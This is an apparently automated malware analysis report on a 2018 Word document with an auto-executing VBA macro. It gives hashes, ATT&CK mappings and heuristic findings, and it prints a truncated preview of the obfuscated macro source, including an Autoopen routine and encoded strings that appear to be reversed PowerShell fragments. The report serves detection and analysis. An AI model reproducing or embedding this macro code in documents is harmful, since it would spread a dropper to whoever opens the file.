Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e9ce75548681b4a0…

MALICIOUS

Office (OLE)

181.5 KB Created: 2018-05-18 21:48:00 Authoring application: Microsoft Office Word First seen: 2018-06-30
MD5: 2297dd78a6db1be39893af39b38ffd4f SHA-1: 27415aa4ed7fd7c1d8109a78b3c6539ae257df8c SHA-256: e9ce75548681b4a09ba8de42661a64af79e414d352986880ece749d97d687c28
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing a critical heuristic firing for a Shell() call within VBA macros. The AutoOpen macro is present, indicating it executes automatically upon opening. While the VBA code is heavily obfuscated, the presence of the Shell() call strongly suggests an intent to execute arbitrary commands, likely to download and run a second-stage payload. No specific family could be identified due to the obfuscation.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 187280 bytes
SHA-256: 009c17f2690e79b829fc30d795ea06b5fd9c12eafa0337666e627d870802aed1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GRRvLCFN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub XjjdbV(FQIZIt)
For wKbMF = 42537 To 10028
      For iiAja = 5970 To LrauC
         iSCdqf = ChrB(YSFoK)
      Next
      YnzvMu = 40392 * 20810
      wcsvr = ERzNra + sZiPq
Next
End Sub
Sub oMdMY(ijMvNA)
For ijUZlu = 76612 To 37161
      For AFaTO = 17387 To aMzDRW
         VQULMw = ChrB(VmNKwi)
      Next
      AzVDk = 38581 * 22986
      lEVVo = jQzPHr + IRjbVb
Next
For TNJSaX = 50695 To 29566
      For AjCdwi = 29555 To rJGmVQ
         prZrjl = ChrB(PshDYv)
      Next
      vQLTo = 93613 * 68145
      NAdBt = LVrzzP + jwijpY
Next
For KwuGU = 72495 To 92194
      For uShTKk = 58065 To NirrD
         pFbfa = ChrB(SckwY)
      Next
      uRFXh = 15851 * 77152
      bYQiE = EZVEzj + oGofo
Next
End Sub
Sub jaRii(spNTpw)
For DlvQpz = 51975 To 66166
      For sHfAr = 9833 To KQssz
         sJqhi = ChrB(CrGfI)
      Next
      ccspz = 65310 * 26027
      chKCiD = jCCzDm + tlaIOO
Next
For PmcXmO = 55933 To 26063
      For RKfVb = 20006 To ozfYTp
         iEbdj = ChrB(PrTww)
      Next
      vhivo = 19638 * 42018
      kmYRYi = lIipMZ + tTKluG
Next
End Sub
Sub Autoopen()
On Error Resume Next
For aqjYN = 28210 To 34064
      For DqOzI = 37536 To fKEAVd
         kIknOo = ChrB(kDQPa)
      Next
      vrsLT = 38466 * 51941
      sbPRO = nAjtkc + GXoZAd
Next
LDsnjtzzMnH (TmwhhI + fTiLFLOrV + nRtjB)
For dshUW = 99628 To 80872
      For kXWfw = 35907 To UElTqb
         GchjFz = ChrB(imNiZO)
      Next
      pTDAn = 55394 * 67586
      cBjqK = NINLb + mFnmus
Next
End Sub
Sub BkJzY(biliS)
For wCqAf = 1224 To 28691
      For jVdAWw = 42955 To kjQGvG
         iSEKlj = ChrB(cauIcp)
      Next
      FHlfFq = 60768 * 13421
      aaiAu = RMHsU + hbqcD
Next
For tDFOVj = 61653 To 59119
      For fapPC = 44720 To ijDjv
         IiBkU = ChrB(XjvCCA)
      Next
      DDMFBU = 29948 * 60936
      lSdSpX = GYUvWu + NkLzG
Next
For jXnPQU = 10874 To 34302
      For CPfrWw = 67309 To CtAip
         iEPIhz = ChrB(pWImC)
      Next
      iNCVS = 60396 * 54756
      EPiYZ = iJDGKu + FKALYS
Next
End Sub
Sub NsWEU(EsAYiD)
For Hdokk = 14442 To 40070
      For jTCcHT = 49277 To BJtMT
         MtZDq = ChrB(lIfYG)
      Next
      mbWPbQ = 96099 * 36101
      ZUcMPi = zOoqtw + vLjRu
Next
End Sub

Attribute VB_Name = "XndVZjz"
Sub licOAc(Yzravv)
For QjPoo = 20688 To 51822
      For vzDNJ = 72049 To GmijJN
         LctWdW = ChrB(oqzKN)
      Next
      tGlsn = 11342 * 63087
      cLnSBi = FrOmwk + nvSjE
Next
End Sub
Function fTiLFLOrV()
On Error Resume Next
For GJDCwO = 93535 To 241
      For qtDjt = 66713 To GDcoW
         wlYRmV = ChrB(qaGBp)
      Next
      TIkWnl = 82849 * 9159
      UjPqp = pOEPU + KSiib
Next
For tbJhvL = 36629 To 59850
      For UjwHz = 50439 To DIkjUu
         bWUTnL = ChrB(wDwrGN)
      Next
      csqVA = 41412 * 50521
      YFbdwR = VKFzo + LbsfTf
Next
GoEOXHE = iFtPF("B1zLOUtY+UtYbo-WAUtY+UtYq+WAqwWAq+WAqenWA'+'q(.0Gc", 1420 + 4 - 1420, 1420 + 42 - 1420)
For jzQtN = 66659 To 51954
      For tKTYM = 68680 To OrJOVh
         nlHZZR = ChrB(wqhpE)
      Next
      YoiQO = 81932 * 511
      zmabzN = AVFKo + MfmoIJ
Next
For RRFtX = 336 To 16202
      For mdqmY = 54719 To hjpnZ
         ZWiLJ = ChrB(bRRjPK)
      Next
      ncsFnD = 70936 * 78304
      mXdWVZ = bKBGms + bhNShE
Next
iiLsHiR = iFtPF("Tw0B 63]rahc[,UtYC4dUtY  ECaLperc- 43]rahc[,UtYnFOUtYeCalpEr-)UtY}}{hUt'+'Y+Ut'+'YctUtY+UtYaUtY+UtYc}UtY+UtY;ka'+'UtY+UtYerb;)UtY+UtYCDSC4'+'UtY+UtYd()WUtY+UtYAqmetUtY+UtYI-eWhJd", 97858 + 4 - 97858, 97858 + 171 - 97858)
For zabto = 57478 To 78768
      For Bkoazk = 14081 To mNBYpV
         EsviR = ChrB(ZlDkG)
      Next
      wCdjvE = 2111 * 17239
      SLuKU = aFfjfc + XBtvX
Next
For wHnDi = 15028 To 97989
      For jwTsH
... (truncated)